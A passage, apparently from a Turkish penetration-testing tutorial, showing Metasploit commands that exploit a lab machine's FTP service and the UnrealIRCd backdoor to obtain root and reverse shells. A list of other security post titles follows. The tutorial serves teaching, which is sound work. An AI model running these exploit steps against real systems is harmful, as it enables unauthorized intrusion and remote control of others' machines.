Exploitimizi de payloadımızı da seçtik. Şimdi bu exploitin hangi sisteme IP'ye sızacağını belirtmemiz gerek. Aksi takdirde exploit hangi sisteme sızma işlemi yapacağını normal olarak bilemeyecektir. Ayarları göstermek için ise;

show options

komutunu kullanırız.

Buradaki ayarların ne olduğunu açıklayacak olursak,
RHOST Hedef cihazın IP’si olmalı,
RPORT ise hedef cihazda hangi porttan sızma işlemi yapacaksak o portun numarası olmalı.
Bu ayarları değiştirmek için;

set RHOST 10.0.2.4

set RPORT 21

Sızma işlemini başlatmak için ise

run

ya da

exploit

Komutlarını kullanırız.

Görüldüğü gibi bir shell bağlantısının açıldığı yazıyor ekranda. Şuan karşı sisteme başarılı bir şekilde sızdığımızı söyleyebilirim. Şuan karşı sistemde bazı komutları kullanmayı deneyebilirsiniz. Örnek olarak ls , whoami vb.

Hedef sistemde hangi kullanıcı ile giriş yaptığımızı görmek için
whoami kullanalım.

Gördüğünüz gibi root kullanıcıyız.Ancak her zaman bu kadar şanslı olamayabiliriz. Yetkisi düşük bir kullanıcı ile giriş yapmış olabilirdir.O zaman da yetkimizi yükseltmek için farklı yöntemlere başvuracaktık.

Şimdi ise başka bir sızma testini reverse payload ile yapalım.

Bu sefer 6667. portta çalışan servisten sisteme sızacağız.

Msfconsole üzerinden bu servisi aratalım.

Search UnrealIRCd

Gördüğünüz gibi yine bu servis ile ilgili bir exploit bulundu. Hemen kullanımına geçelim.

Bulduğumuz exploiti seçelim.

use exploit/unix/irc/unreal_ircd_3281_backdoor

Exploiti use komutu ile seçtikten sonra payloadlara göz atalım.

show payloads

Payladımızı set komutu ile seçelim

set payload payload/cmd/unix/reverse

Her payload çalışmayabilir,çalışmayan payload olursa başka bir payload denemeliyiz.Eğer sisteme sızamazsak bu exploit çalışmadığı anlamına gelmez.Payload'ımızda sorun olabilir,farklı payloadlar denersek sorunu çözebiliriz.

Gerekli ayarlamaları yapalım.

show options

Bu sefer RHOST ve RPORT dışında da farklı ayarlar gördük. Bunlar LHOST ve LPORT .Peki bu LHOST ve LPORT nedir. Başta anlattığımız reverse payload'ın ayarlarıdır. Reverse payloadın çalışma mantığı sızacağımız sistem bize bağlanıyordu. Bu yüzden

LHOST bizim IP adresimiz
LPORT karşı bağlantının bizimle iletişime geçecek olan port numarası.

Ayarları yaptıktan sonra exploiti çalıştırabiliriz.

Ve gördüğünüz gibi tekrardan karşı sisteme sızmış bulunmaktayız...

DEV Community: YUSIBER

LetsDefend SOC104 - Malware Detected

Genel Bakış

Analiz

Playbook

LetsDefend SOC141 - Phishing URL Detected

Uyarı Detayları

Veri Toplama

Log Araştırması

URL Analizi

IP/URL/Etki Alanına Erişen Var mı?

EDR Sınırlaması

MITRE ATT&CK

MITRE ATT&CK NEDİR ?

ENTERPRISE İÇİN MITRE ATT&CK MATRİSİ NEDİR ?

MITRE ATT&CK'ı OPERASYONEL HALE GETİRME ?

Sonuç

Yararlanılan Kaynaklar

LetsDefend SOC143 - Password Stealer Detected

Cyber Threat Hunting

Tehdit Avcılığı Yaşam Döngüsü

1. HİPOTEZ OLUŞTURMA :

2. ARAŞTIRMA :

3. ORTAYA ÇIKARMA :

4. BİLGİLENDİRME VE ZENGİNLEŞTİRME :

Sonuç

Yararlanılan Kaynaklar

LetsDefend SOC 147 - SSH Scan Activity

tcpdump İle Ağ Analizi

IP Filtrelemesi

Apache2 Uygulaması

Port Filtrelemesi

TCP Flaglerinin Filtrelenmesi

Sonuç

Yararlanılan Kaynaklar

Cyber Threat Intelligence

Siber Tehdit İstihbaratı Nedir?

Siber Tehdit İstihbaratı Neden Önemlidir?

Siber Tehdit İstihbaratı Türleri Nelerdir?

1)Taktiksel İstihbarat

2)Stratejik İstihbarat

3)Operasyonel İstihbarat

Siber Tehdit İstihbaratı Yaşam Döngüsü

1. Gereksinimler ve Planlama

2. Toplama

3. İşleme

4. Analiz

5. Yaygınlaştırma

6. Geri Bildirim

Yararlanılan Kaynaklar

OSI Referans Modeli

OSI Modeli Nedir?

OSI Katmanları

1. Fiziksel Katman

2. Veri Bağlantısı Katmanı

3. Ağ Katmanı

4. Taşıma Katmanı

5. Oturum Katmanı

6. Sunum Katmanı

7. Uygulama Katmanı

Yararlanılan Kaynaklar

Wireshark ile Ağ Analizi

Wireshark Nedir?

Teoman Yalçınöz for YUSIBER ・ Dec 18 '21

Wireshark ile DNS analizi

DNS İçin Kullanılabilecek Diğer Filtreler

Wireshark ile ARP Analizi

ARP İçin Kullanılabilecek Diğer Filtreler

Wireshark ile ICMP/Ping Analizi

ICMP(Internet Control Message Protocol):​

Wireshark ile HTTP Analizi

HTTP İçin Kullanılabilecek Diğer Filtreler

Sonuç:

Yararlanılan kaynaklar

Wireshark Nedir?

Wireshark Nedir?

Kullanım Alanları

Paket Yakalama Algoritma Diyagramı

Sonuç:

Yararlanılan Kaynaklar

ICMP(Internet Control Message Protocol):